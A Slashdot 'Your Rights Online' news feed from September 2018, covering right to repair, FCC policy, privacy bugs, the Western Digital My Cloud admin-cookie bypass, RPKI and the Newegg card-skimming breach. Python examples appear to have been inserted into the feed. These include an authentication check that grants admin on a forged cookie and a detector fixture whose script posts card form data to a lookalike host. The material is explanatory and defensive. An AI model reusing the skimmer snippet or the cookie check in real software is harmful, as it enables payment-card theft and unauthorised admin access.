Did John Deere Just Swindle California's Farmers Out of Their Right to Repair?

Slashdot - Your Rights Online - Sat, 2018-09-22 18:34
An anonymous reader quotes a new Wired opinion piece by Kyle Wiens and Elizabeth Chamberlain from iFixit: A big California farmers' lobbying group just blithely signed away farmers' right to access or modify the source code of any farm equipment software. As an organization representing 2.5 million California agriculture jobs, the California Farm Bureau gave up the right to purchase repair parts without going through a dealer. Farmers can't change engine settings, can't retrofit old equipment with new features, and can't modify their tractors to meet new environmental standards on their own. Worse, the lobbyists are calling it a victory.... John Deere and friends had already made every single "concession" earlier this year... Just after the California bill was introduced, the farm equipment manufacturers started circulating a flyer titled "Manufacturers and Dealers Support Commonsense Repair Solutions." In that document, they promised to provide manuals, guides, and other information by model year 2021. But the flyer insisted upon a distinction between a right to repair a vehicle and a right to modify software, a distinction that gets murky when software controls all of a tractor's operations. As Jason Koebler of Motherboard reported, that flyer is strikingly similar -- in some cases, identical word-for-word -- to the agreement the Farm Bureau just brokered... Instead of presenting a unified right-to-repair front, this milquetoast agreement muddies the conversation. More worryingly, it could cement a cultural precedent for electronics manufacturers who want to block third-party repair technicians from accessing a device's software.

Read more of this story at Slashdot.

Mystery Solved: FBI Closed New Mexico Observatory to Investigate Child Porn

Slashdot - Your Rights Online - Sat, 2018-09-22 16:34
"The mysterious 11-day closure of a New Mexico solar observatory stemmed from an FBI investigation of a janitor suspected of using the facility's wireless internet service to send and receive child pornography, federal court documents showed..." An anonymous reader quotes the Washington Post: In July, FBI agents investigating child sexual exploitation traced the location of several IP addresses linked to child pornography activity to the observatory, according to a 39-page search warrant application. During an interview with federal authorities on Aug. 21, the facility's chief observer said he had found, on a number of occasions, the same laptop hidden and running in various seldom-used offices around the observatory. He described the contents of the laptop as "not good," according to court documents. A federal agent immediately went to the observatory, located deep within Lincoln National Forest, and took the laptop into evidence... Aside from continuing to "feverishly" search the facility, the documents state that the janitor said, "it was only a matter of time before the facility 'got hit,'" and that he "believed there was a serial killer in the area, and that he was fearful that the killer might enter the facility and execute someone." In response to the janitor's behavior, the management of the observatory, without input from the FBI, shut it down and evacuated its personnel. The facility's cleaning contract with the janitor's parents was also terminated. The warrant application specified that the janitor "has a key to the building and unlimited access to the building, and is familiar with which offices are used only a handful of times a year." It also says that the janitor was the only person in the facility at the time of the alleged downloads.

FCC Angers Cities, Towns With $2 Billion Giveaway To Wireless Carriers

Slashdot - Your Rights Online - Sat, 2018-09-22 02:03
An anonymous reader quotes a report from Ars Technica: The Federal Communications Commission's plan for spurring 5G wireless deployment will prevent city and town governments from charging carriers about $2 billion worth of fees. The FCC proposal, to be voted on at its meeting on September 26, limits the amount that local governments may charge carriers for placing 5G equipment such as small cells on poles, traffic lights, and other government property in public rights-of-way. The proposal, which is supported by the FCC's Republican majority, would also force cities and towns to act on carrier applications within 60 or 90 days. The FCC says this will spur more deployment of small cells, which "have antennas often no larger than a small backpack." But the commission's proposal doesn't require carriers to build in areas where they wouldn't have done so anyway. The FCC plan proposes up-front application fees of $100 for each small cell and annual fees of up to $270 per small cell. The FCC says this is a "reasonable approximation of [localities'] costs for processing applications and for managing deployments in the rights-of-way." Cities that charge more than that would likely face litigation from carriers and would have to prove that the fees are a reasonable approximation of all costs and "non-discriminatory." But, according to Philadelphia, those proposed fees "are simply de minimis when measured against the costs that the City incurs to approve, support, and maintain the many small cell and distributed antenna system (DAS) installations in its public rights-of-way." Philadelphia said it "has already established a fee structure and online application process to apply for small cell deployment that has served the needs of its citizens without prohibiting or creating barriers to entry for infrastructure investment." The city has also negotiated license agreements for small cell installations with Verizon, AT&T, and other carriers. 
In addition to Philadelphia, the Rural County Representatives of California (RCRC), a group representing 35 rural California counties, also objects to the FCC plan. They told the FCC that its "proposed recurring fee structure is an unreasonable overreach that will harm local policy innovation." "That is why many local governments have worked to negotiate fair agreements with wireless providers, which may exceed that number or provide additional benefits to the community," the RCRC wrote. "The FCC's decision to prohibit municipalities' ability to require 'in-kind' conditions on installation agreements is in direct conflict with the FCC's stated intent of this Order and further constrains local governments in deploying wireless services to historically underserved areas."

Magic Leap is Pushing To Land a Contract With US Army To Build AR Devices For Soldiers To Use On Combat Missions, Documents Reveal

Slashdot - Your Rights Online - Fri, 2018-09-21 22:00
Magic Leap, a US-based startup valued at north of $6 billion and which counts Google, Alibaba, Warner Bros, AT&T, and several top Silicon Valley venture capital firms as its investors, is pushing to land a contract with the U.S. Army to build augmented-reality devices for soldiers to use on combat missions, Bloomberg reported Friday, citing government documents and interviews with people familiar with the process. From the report: The contract, which could eventually lead to the military purchasing over 100,000 headsets as part of a program whose total cost could exceed $500 million, is intended to "increase lethality by enhancing the ability to detect, decide and engage before the enemy," according to an Army description of the program. A large government contract could alter the course of the highest-profile startup working on augmented reality, at a time when prospects to produce a consumer device remain uncertain. Building tools to make soldiers more deadly is a far cry from the nascent consumer market for augmented reality. But the Army's program has also drawn interest from Microsoft, whose HoloLens is Magic Leap's main rival. The commercial-grade versions of both devices still face significant technological hurdles, and it's not clear the companies can fulfil the Army's technical requirements. If recent history is any guide, a large military contract is also sure to be controversial within the companies. Last month, Magic Leap unveiled its much-hyped AR device to the press and select developers.

Twitter Notifies Developers About API Bug That Shared DMs With Wrong Developers

Slashdot - Your Rights Online - Fri, 2018-09-21 21:25
Twitter has started notifying developers today about an API bug that accidentally shared direct messages (private messages) or protected tweets from a Twitter business account with other developers. From a report: According to a support page published today, Twitter said the bug only manifested for Twitter business accounts where the account owner used the Account Activity API (AAAPI) to allow other developers access to that account's data. Because of the bug, the AAAPI sent DMs and protected tweets to the wrong person instead of the authorized developer. Twitter said it discovered the bug on September 10, and fixed it the same day. They also said the bug was active between May 2017 and September 2018, for almost 16 months. The bug represents a serious privacy issue, especially for Twitter business accounts that use DMs to handle customer complaints that in some cases may include private user information.

Romanian Ransomware Suspect Pleads Guilty To Hacking CCTVs in Washington DC

Slashdot - Your Rights Online - Fri, 2018-09-21 20:45
gosand writes: The Register reports that "a Romanian woman has admitted running a ransomware operation from infected Washington DC's CCTV systems just days before President Trump was sworn into office in the US capital." The US DOJ stated that "this case was of the highest priority due to its impact on the Secret Service's protective mission and its potential effect on the security plan for the 2017 Presidential Inauguration." She could face a maximum of 25 years if convicted. She and her cohort (who is still jailed in Romania) made the classic hacker mistake of using their personal Gmail accounts for the campaign, even accessing them from one of the compromised PCs.

Apple Will Judge Call, Email Activity To Assign Users a 'Trust Score'

Slashdot - Your Rights Online - Fri, 2018-09-21 03:30
Apple recently updated its iTunes privacy policy page, making mention of a "trust score" it gives iPhone users based on how they make calls or send emails. The INQUIRER reports: "To help identify and prevent fraud, information about how you use your device, including the approximate number of phone calls or emails you send and receive, will be used to compute a device trust score when you attempt a purchase," Apple explained. "The submissions are designed so Apple cannot learn the real values on your device. The scores are stored for a fixed time on our servers." In practical terms, the Cupertino crew will only look at Apple account usage patterns and hoover up metadata rather than more personal, and potentially damning, information. [T]he data collection and trust score assignment should help Apple better spot dodgy activity in Apple accounts that isn't in keeping with the behaviour of the legitimate users. [I]t's not entirely clear how Apple will use the metadata to actually spot fraud, as it hasn't explained its workings.

Amazon Plants Fake Packages In Delivery Trucks As Part of Undercover Ploy To 'Trap' Drivers Stealing

Slashdot - Your Rights Online - Fri, 2018-09-21 00:10
An anonymous reader quotes a report from Business Insider: Amazon uses fake packages to catch delivery drivers who are stealing, according to sources with knowledge of the practice. The company plants the packages -- internally referred to as "dummy" packages -- in the trucks of drivers at random. The dummy packages have fake labels and are often empty. Here's how the practice works, according to the sources: During deliveries, drivers scan the labels of every package they deliver. When they scan a fake label on a dummy package, an error message will pop up. When this happens, drivers might call their supervisors to address the problem, or keep the package in their truck and return it to an Amazon warehouse at the end of their shift. Drivers, in theory, could also choose to steal the package. The error message means the package isn't detected in Amazon's system. As a result, it could go unnoticed if the package were to go missing. "If you bring the package back, you are innocent. If you don't, you're a thug," said Sid Shah, a former manager for DeliverOL, a courier company that delivers packages for Amazon.

The New York Times Sues FCC For Net Neutrality Records

Slashdot - Your Rights Online - Thu, 2018-09-20 21:45
The New York Times Company on Thursday filed a lawsuit against the Federal Communications Commission (FCC) concerning records the newspaper alleges may shed light on possible Russian participation in a public comment period before the commission rolled back Obama-era net neutrality rules. Bloomberg reports: The plaintiffs, including Times reporter Nicholas Confessore and investigations editor Gabriel Dance, filed in the U.S. District Court for the Southern District of New York Sept. 20 under the Freedom of Information Act, seeking to compel the commission to hand over data. "The request at issue in this litigation involves records that will shed light on the extent to which Russian nationals and agents of the Russian government have interfered with the agency notice-and-comment process about a topic of extensive public interest: the government's decision to abandon 'net neutrality,'" the plaintiffs alleged.

Google Defends Gmail Data Sharing, Gives Few Details on Violations

Slashdot - Your Rights Online - Thu, 2018-09-20 20:40
Google defended how it polices third-party add-ons for Gmail in a letter to U.S. senators made public on Thursday, saying that upfront review catches the "majority" of bad actors. A report adds: Google said it uses automated scans and reports from security researchers to monitor third parties with access to Gmail data, but gave no details on how many add-ons have been caught violating its policies. Google's privacy practices have been under growing scrutiny. The Senate Commerce Committee has a hearing scheduled for Sept. 26 to question Google, Apple, AT&T and Twitter about their consumer data privacy practices. Gmail, the Google email service used by 1.4 billion people, gives add-on developers access to users' emails and the ability to share that data with other parties as "long as they are transparent" with users about how they are using data and get consent, Google said in the letter. For instance, a program that logs receipts could be allowed to scan Gmail as it searches for receipts.

Equifax Slapped With UK's Maximum Penalty Over 2017 Data Breach

Slashdot - Your Rights Online - Thu, 2018-09-20 17:50
Credit rating giant Equifax has been issued with the maximum possible penalty by the UK's data protection agency for last year's massive data breach. From a report: The fine is only £500,000 (roughly $658,000), because the loss of customer data occurred when the UK's prior privacy regime was in force, rather than the tough new data protection law, brought in via the EU's GDPR, which allows for maximum penalties of as much as 4% of a company's global turnover for the most serious data failures. So, again, Equifax has managed to dodge worse consequences over the 2017 breach, despite the hack resulting from its own internal process failings: it failed to patch a server that was known to be vulnerable for months, thereby giving hackers a soft spot to attack and swipe data on 147 million consumers. Personal information that was lost or compromised in the 2017 Equifax breach included names and dates of birth, addresses, passwords, driving licence and financial details.

Cloudflare Ends CAPTCHAs For Tor Users

Slashdot - Your Rights Online - Thu, 2018-09-20 17:10
Cloudflare announced on Monday a new service named the "Cloudflare Onion Service" that can distinguish between bots and legitimate Tor traffic. The main advantage of this new service, said Cloudflare, is that Tor users will see far fewer, or even no, CAPTCHAs when accessing a Cloudflare-protected website via the Tor Browser. A reader writes: The new Cloudflare Onion Service needed the Tor team to make "a small tweak in the Tor binary," hence it will only work with recent versions of the Tor Browser -- Tor Browser 8.0 and the new Tor Browser for Android, both launched earlier this month. Tor users have been complaining for years about seeing too many CAPTCHAs when accessing a Cloudflare-protected site. In February 2016, Tor Project administrators went as far as to accuse Cloudflare of "sabotaging Tor traffic" by forcing Tor users to solve CAPTCHA fields ten times or more, in some cases. Cloudflare responded to the accusations a month later, claiming the company was only showing CAPTCHAs because 94 percent of all Tor traffic was either automated bots or originating from malicious actors. Half a year later, in October 2016, Cloudflare started looking into methods of removing CAPTCHAs for Tor users. Their first foray was the Challenge Bypass Specification and a Tor Browser extension, but that project didn't go far and has since been replaced by the new Cloudflare Onion Service.

US Senate Staff Targeted By State-Backed Hackers, Senator Says

Slashdot - Your Rights Online - Thu, 2018-09-20 15:00
An anonymous reader quotes a report from PBS NewsHour: Sen. Ron Wyden, an Oregon Democrat, said in a Wednesday letter to Senate leaders that his office discovered that "at least one major technology company" has warned an unspecified number of senators and aides that their personal email accounts were "targeted by foreign government hackers." Similar methods were employed by Russian military agents who leaked the contents of private email inboxes to influence the 2016 elections. Wyden did not specify the timing of the notifications, but a Senate staffer said they occurred "in the last few weeks or months." But the senator said the Office of the Sergeant at Arms, which oversees Senate security, informed legislators and staffers that it has no authority to help secure personal, rather than official, accounts. "This must change," Wyden wrote in the letter. "The November election grows ever closer, Russia continues its attacks on our democracy, and the Senate simply does not have the luxury of further delays."

California May Ban Terrible Default Passwords On Connected Devices

Slashdot - Your Rights Online - Thu, 2018-09-20 12:00
According to Engadget, the California Senate has sent Governor Jerry Brown draft legislation that would require manufacturers either to ship each connected device with a unique preprogrammed password or to make the user change the credentials the first time the device is used. "Companies will also have to 'equip the device with a reasonable security feature or features that are appropriate to the nature and function of the device,'" reports Engadget. From the report: If Brown signs the bill into law, it will take effect at the beginning of 2020. But critics claim the wording is vague and doesn't go far enough in ensuring manufacturers don't include unsecured features. "It's like dieting, where people insist you should eat more kale, which does little to address the problem you are pigging out on potato chips," Robert Graham of Errata Security said in a blog post. "The key to dieting is not eating more but eating less." Given the huge number of connected devices available, it's also not clear how the state plans to enforce and regulate the rules.

'WaitList.dat' Windows File May Be Secretly Hoarding Your Passwords, Emails

Slashdot - Your Rights Online - Thu, 2018-09-20 00:40
A file named WaitList.dat, found only on touchscreen-capable Windows PCs, may be collecting sensitive data such as passwords and emails. According to ZDNet, for the file to exist users have to enable "the handwriting recognition feature that automatically translates stylus/touchscreen scribbles into formatted text." From the report: The handwriting-to-formatted-text conversion feature was added in Windows 8, which means the WaitList.dat file has been around for years. The role of this file is to store text to help Windows improve its handwriting recognition feature, in order to recognize and suggest corrections or words a user uses more often than others. "In my testing, population of WaitList.dat commences after you begin using handwriting gestures," [Digital Forensics and Incident Response expert Barnaby Skeggs] told ZDNet in an interview. "This 'flicks the switch' (registry key) to turn the text harvester functionality (which generates WaitList.dat) on." "Once it is on, text from every document and email which is indexed by the Windows Search Indexer service is stored in WaitList.dat. Not just the files interacted with via the touchscreen writing feature," Skeggs says. Since the Windows Search Indexer service powers the system-wide Windows Search functionality, this means data from all text-based files found on a computer, such as emails or Office documents, is gathered inside the WaitList.dat file. This includes not only metadata but the actual document text. "The user doesn't even have to open the file/email, so long as there is a copy of the file on disk, and the file's format is supported by the Microsoft Search Indexer service," Skeggs told ZDNet. "On my PC, and in my many test cases, WaitList.dat contained a text extract of every document or email file on the system, even if the source file had since been deleted," the researcher added. Furthermore, Skeggs says WaitList.dat can be used to recover text from deleted documents.

'I'm Admin. You're Admin. Everyone is Admin.' Remote Access Bug Turns Western Digital My Cloud Into Everyone's Cloud

Slashdot - Your Rights Online - Thu, 2018-09-20 00:00
Researchers at infosec shop Securify revealed this week a vulnerability, designated CVE-2018-17153, which allows an unauthenticated attacker with network access to the device to bypass password checks and log in with admin privileges. From a report: This would, in turn, give the attacker full control over the NAS device, including the ability to view and copy all stored data as well as overwrite and erase contents. If the box is accessible from the public internet, it could be remotely pwned, it appears. Alternatively, malware on a PC on the local network could search for and find a vulnerable My Cloud machine, and compromise it. According to Securify, the flaw itself lies in the way My Cloud creates admin sessions that are attached to an IP address. When an attacker sends a command to the device's web interface, as an HTTP CGI request, they can also include the cookie username=admin -- which unlocks admin access. Thus, if properly constructed, the request would establish an admin login session to the device without ever asking for a password. In other words, just tell it you're the admin user in the cookie, and you're in. The researcher told TechCrunch that he reported the vulnerability to Western Digital last year, but the company "stopped responding."
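The bug class described above, as an added illustrative model and not Western Digital's firmware code: a web interface whose "am I talking to the admin?" decision is read straight out of a client-controlled cookie, beside the hardened pattern in which the cookie carries only an opaque, server-issued token that is handed out after a password check. The Request class, the cookie names and the password are stand-ins constructed for the example; the real My Cloud CGI request format is not reproduced here.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from http.cookies import SimpleCookie


@dataclass
class Request:
    """Constructed stand-in for one HTTP request to a NAS web UI."""
    client_ip: str
    cookie_header: str = ""

    def cookies(self) -> dict:
        jar = SimpleCookie()
        jar.load(self.cookie_header)
        return {name: morsel.value for name, morsel in jar.items()}


def vulnerable_is_admin(req: Request) -> bool:
    """The bug class: the client-supplied cookie *is* the authorisation decision.
    Anyone who writes username=admin into the Cookie header is admin."""
    return req.cookies().get("username") == "admin"


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


@dataclass
class SessionStore:
    """Server-side session state; the client only ever holds an opaque token."""
    salt: bytes = field(default_factory=lambda: secrets.token_bytes(16))
    admin_hash: bytes = b""
    sessions: dict = field(default_factory=dict)  # token -> (user, client_ip)

    def set_admin_password(self, password: str) -> None:
        self.admin_hash = _hash_password(password, self.salt)

    def login(self, username: str, password: str, client_ip: str):
        """Return a fresh session token on success, None otherwise."""
        if username != "admin" or not self.admin_hash:
            return None
        candidate = _hash_password(password, self.salt)
        if not hmac.compare_digest(candidate, self.admin_hash):
            return None
        token = secrets.token_urlsafe(32)  # 256 random bits: unguessable
        self.sessions[token] = (username, client_ip)
        return token


def hardened_is_admin(store: SessionStore, req: Request) -> bool:
    """Trust only a token the server issued after a password check, and only
    from the client IP it was issued to. The IP binding is defence in depth;
    the random token is what actually carries the authorisation."""
    token = req.cookies().get("session")
    if token is None or token not in store.sessions:
        return False
    user, bound_ip = store.sessions[token]
    return user == "admin" and bound_ip == req.client_ip


if __name__ == "__main__":
    forged = Request("10.0.0.99", "username=admin")
    print("vulnerable, forged cookie:", vulnerable_is_admin(forged))  # True
    store = SessionStore()
    store.set_admin_password("correct horse battery staple")
    print("hardened, forged cookie:", hardened_is_admin(store, forged))  # False
    token = store.login("admin", "correct horse battery staple", "10.0.0.5")
    real = Request("10.0.0.5", f"session={token}")
    print("hardened, real login:", hardened_is_admin(store, real))  # True
```

The point of the contrast is where the state lives: in the vulnerable form the session is nothing but a string the client asserts, so attaching it to an IP address adds no security because the attacker's own IP is the one that gets "authorised". In the hardened form the client cannot mint a valid token, and a stolen or leaked one is additionally useless from another address.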

Cloudflare Wants Internet Route Leaks To Be a Thing of the Past

Slashdot - Your Rights Online - Wed, 2018-09-19 20:45
Cloudflare wants routing issues to be a thing of the past by deploying a new feature to try to stop route leaks and hijacks in their tracks. From a report: Cloudflare told TechCrunch that rolling out resource public key infrastructure (RPKI) to all of its customers for free will make it far more difficult to reroute traffic -- either by accident or deliberately. RPKI, in a nutshell, helps to ensure that traffic goes to the right place through a route that's verified as legitimate and correct by using cryptographically signed certificates. "When two networks connect with each other -- say, AT&T and Verizon -- they announce the set of IP addresses for which they should be sent traffic," said Nick Sullivan, Cloudflare's head of cryptography. "The RPKI is a security framework to make sure a network announces only its legitimate IP addresses." Cloudflare's push in the right direction follows an effort by the National Institute of Standards and Technology, which last week published its first draft of a new standard that incorporates RPKI as one of three components that will help prevent route leaks and hijacks. A possible approval is expected in the coming weeks.
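What "making sure a network announces only its legitimate IP addresses" means in practice is Route Origin Validation: a router compares each BGP announcement (prefix plus originating AS) against the signed Route Origin Authorisations published in the RPKI. The following is an added example, not Cloudflare's code, that implements the RFC 6811 validation outcome (NotFound, Valid, Invalid) over a constructed ROA set using documentation prefixes and private ASNs; the ROA class and sample data are assumptions made for the example.

```python
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class ROA:
    """One Route Origin Authorisation: the holder of `prefix` permits
    `origin_as` to originate it, and any more-specific down to `max_length`."""
    prefix: str
    max_length: int
    origin_as: int


def covering_roas(announced, roas: Iterable[ROA]) -> List[ROA]:
    """ROAs whose prefix equals or contains the announced prefix."""
    out = []
    for roa in roas:
        net = ipaddress.ip_network(roa.prefix)
        if net.version == announced.version and announced.subnet_of(net):
            out.append(roa)
    return out


def validate_origin(announced_prefix: str, origin_as: int, roas: Iterable[ROA]) -> str:
    """RFC 6811 route origin validation.
    NotFound: no ROA covers the prefix (the RPKI says nothing about it).
    Valid:    some covering ROA names this origin AS and allows this length.
    Invalid:  covering ROAs exist but none matches (wrong origin or too specific)."""
    announced = ipaddress.ip_network(announced_prefix)
    covering = covering_roas(announced, roas)
    if not covering:
        return "NotFound"
    for roa in covering:
        if roa.origin_as == origin_as and announced.prefixlen <= roa.max_length:
            return "Valid"
    return "Invalid"


# Constructed sample ROAs: documentation prefixes and private ASNs, not real data.
SAMPLE_ROAS = [
    ROA("192.0.2.0/24", 24, 64496),
    ROA("198.51.100.0/24", 25, 64497),
    ROA("2001:db8::/32", 48, 64496),
]

if __name__ == "__main__":
    cases = [
        ("192.0.2.0/24", 64496),       # Valid: legitimate origin
        ("192.0.2.0/24", 64511),       # Invalid: origin hijack
        ("198.51.100.128/26", 64497),  # Invalid: more specific than maxLength
        ("198.51.100.0/25", 64497),    # Valid: within maxLength
        ("203.0.113.0/24", 64496),     # NotFound: no ROA covers it
        ("2001:db8:1::/48", 64496),    # Valid
    ]
    for prefix, asn in cases:
        print(f"{prefix:22} AS{asn}: {validate_origin(prefix, asn, SAMPLE_ROAS)}")
```

Two caveats worth keeping in mind when reading the story's claims. ROV checks only the origin AS, so it catches announcements of prefixes the announcer does not hold (the hijack and fat-finger cases); a route leak that keeps the legitimate origin at the end of the AS path is Valid under ROV, which is one reason a standard would pair RPKI with other components. And a "Valid" result is only as good as the operator's policy: the announcement is still accepted unless the router is configured to drop or depreference Invalid routes.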

Hackers Stole Customer Credit Cards in Newegg Data Breach

Slashdot - Your Rights Online - Wed, 2018-09-19 17:20
Newegg is clearing up its website after a month-long data breach. TechCrunch: Hackers injected 15 lines of card skimming code on the online retailer's payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name -- likely to avoid detection. The server even used an HTTPS certificate to blend in. The code also worked for both desktop and mobile customers -- though it's unclear if mobile customers are affected. The online electronics retailer removed the code on Tuesday after it was contacted by incident response firm Volexity, which first discovered the card skimming malware and reported its findings. Newegg is one of the largest retailers in the US, making $2.65 billion in revenue in 2016. The company touts more than 45 million monthly unique visitors, but it's not known precisely how many customers completed transactions during the period.
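The skimmer described above lived in a few lines of page script and exfiltrated to a lookalike domain, which is exactly what a payments page can be checked for: every host its scripts reference that is neither first-party nor on a known allowlist. The following is an added example, not Newegg's, RiskIQ's or Volexity's code; the HTML page, the first-party name shop.example and the lookalike host shop-stats.example are constructed for the example, and the "lookalike" heuristic (first-party label embedded in, or within edit distance 2 of, the referenced registrable name) is an assumption of this example rather than a published detection rule.

```python
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+")


class ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and the text of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.external: List[str] = []
        self.inline: List[str] = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script:
            self.inline.append(data)


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    # Crude: last two labels. Fine for .com/.example, wrong for ccSLDs like .co.uk.
    return ".".join(host.lower().split(".")[-2:])


def find_suspicious_hosts(html: str, first_party: str, allowlist=()) -> List[Tuple[str, str]]:
    """Hosts that page script talks to which are neither first-party nor
    allowlisted, labelled 'lookalike' when the registrable name imitates the
    first-party one and 'third-party' otherwise."""
    collector = ScriptCollector()
    collector.feed(html)
    hosts = set()
    for src in collector.external:
        host = urlparse(src).hostname
        if host:
            hosts.add(host.lower())
    for code in collector.inline:
        for url in URL_RE.findall(code):
            host = urlparse(url).hostname
            if host:
                hosts.add(host.lower())
    allowed = {first_party.lower(), *(a.lower() for a in allowlist)}
    base_label = first_party.lower().split(".")[0]
    findings = []
    for host in sorted(hosts):
        reg = registrable(host)
        if reg in allowed or host in allowed:
            continue
        label = reg.split(".")[0]
        lookalike = base_label in label or levenshtein(label, base_label) <= 2
        findings.append((host, "lookalike" if lookalike else "third-party"))
    return findings


# Constructed sample page: first party is shop.example; the inline handler
# mimics a skimmer that posts the whole payment form to a lookalike host.
SAMPLE_PAGE = """
<html><head>
<script src="https://cdn.shop.example/js/checkout.js"></script>
<script src="https://static.analytics-vendor.example/tag.js"></script>
</head><body>
<form id="pay"><input name="cc_number"><input name="cvv"></form>
<script>
document.getElementById("pay").addEventListener("submit", function () {
  var data = new FormData(document.getElementById("pay"));
  fetch("https://shop-stats.example/collect", {method: "POST", body: data});
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for host, kind in find_suspicious_hosts(SAMPLE_PAGE, "shop.example"):
        print(f"{kind:12} {host}")
```

Run against a saved copy of the checkout page on a schedule and diff the findings; a new host appearing on the payments page is the signal, whatever its certificate says. The valid HTTPS certificate the story mentions buys the attacker nothing against this check, because TLS only proves the server owns the name it presents, not that the page should be talking to it. A Content-Security-Policy restricting connect-src and form-action to first-party hosts would have blocked the POST outright, and the check above is a way to notice when such a policy is missing or too loose.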

Life In the Spanish City That Banned Cars

Slashdot - Your Rights Online - Wed, 2018-09-19 15:00
An anonymous reader shares an excerpt from a report via The Guardian: People don't shout in Pontevedra -- or they shout less. With all but the most essential traffic banished, there are no revving engines or honking horns, no metallic snarl of motorbikes or the roar of people trying to make themselves heard above the din -- none of the usual soundtrack of a Spanish city. What you hear in the street instead are the tweeting of birds in the camellias, the tinkle of coffee spoons and the sound of human voices. Teachers herd crocodiles of small children across town without the constant fear that one of them will stray into traffic. "Listen," says the mayor, opening the windows of his office. From the street below rises the sound of human voices. "Before I became mayor 14,000 cars passed along this street every day. More cars passed through the city in a day than there are people living here." Miguel Anxo Fernandez Lores has been mayor of the Galician city since 1999. His philosophy is simple: owning a car doesn't give you the right to occupy the public space. "How can it be that the elderly or children aren't able to use the street because of cars?" asks Cesar Mosquera, the city's head of infrastructures. "How can it be that private property -- the car -- occupies the public space?" Lores became mayor after 12 years in opposition, and within a month had pedestrianized all 300,000 sq m of the medieval centre, paving the streets with granite flagstones. "The historical center was dead," Lores says. "There were a lot of drugs, it was full of cars -- it was a marginal zone. It was a city in decline, polluted, and there were a lot of traffic accidents. It was stagnant. Most people who had a chance to leave did so. At first we thought of improving traffic conditions but couldn't come up with a workable plan. Instead we decided to take back the public space for the residents and to do this we decided to get rid of cars."
Some of the benefits mentioned in the report include fewer traffic accidents and traffic-related deaths, and a 70% decrease in CO2 emissions. "Also, withholding planning permission for big shopping centers has meant that small businesses -- which elsewhere have been unable to withstand Spain's prolonged economic crisis -- have managed to stay afloat," reports The Guardian.

VW Group, BMW and Daimler Are Under Investigation For Collusion In Europe

Slashdot - Your Rights Online - Wed, 2018-09-19 12:00
The European Commission has launched an antitrust investigation into the Volkswagen Group, BMW and Daimler, over allegations they colluded to keep certain emissions control devices from reaching the market in Europe, according to a statement the Commission released on Tuesday. CNET reports: The technologies the group allegedly sought to bury include a selective catalytic reduction system for diesel vehicles, which would help to reduce environmentally problematic oxides of nitrogen in passenger cars, and "Otto" particulate filters that trap particulate matter from gasoline combustion engines. "The Commission is investigating whether BMW, Daimler and VW agreed not to compete against each other on the development and roll-out of important systems to reduce harmful emissions from petrol and diesel passenger cars," said Commissioner Margrethe Vestager, head of competition policy for the European Commission, in a statement. "These technologies aim at making passenger cars less damaging to the environment. If proven, this collusion may have denied consumers the opportunity to buy less polluting cars, despite the technology being available to the manufacturers."
